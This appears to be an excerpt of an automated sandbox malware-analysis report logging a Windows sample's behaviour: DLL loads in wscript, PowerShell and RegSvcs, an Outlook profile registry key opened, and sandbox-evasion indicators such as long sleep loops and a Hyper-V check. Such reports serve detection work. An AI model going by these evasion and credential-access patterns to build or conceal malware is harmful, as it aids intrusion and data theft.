                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06E3A9B5 push dword ptr [ecx+ecx-75h]; iretd 12_2_06E3A9BB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Windows\System32\wscript.exe | Dropped file: Do While GHI < 10000 ' Límite de iteraciones para demostración ("iteration limit for demonstration") WScript.Sleep 10000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (3 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4737
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5138
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6253
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3472
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 3065
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 916
                Source: C:\Windows\System32\wscript.exe TID: 7156 | Thread sleep time: -90000s >= -30000s
                Source: C:\Windows\System32\wscript.exe TID: 2200 | Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076 | Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144 | Thread sleep count: 6253 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396 | Thread sleep count: 3472 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544 | Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 100000, 99890, 99781, 99671, 99562, 99453, 99343, 99234, 99124, 99015, 98905, 98796, 98686, 98573, 98462, 98359, 98249, 98140, 98031, 97921 (20 consecutive calls, the requested delay shrinking by roughly 110 each time)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: wermgr.exe, 0000000E.00000002.2744565315.0000017C07A79000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000E.00000003.2732442187.0000017C07A79000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW|
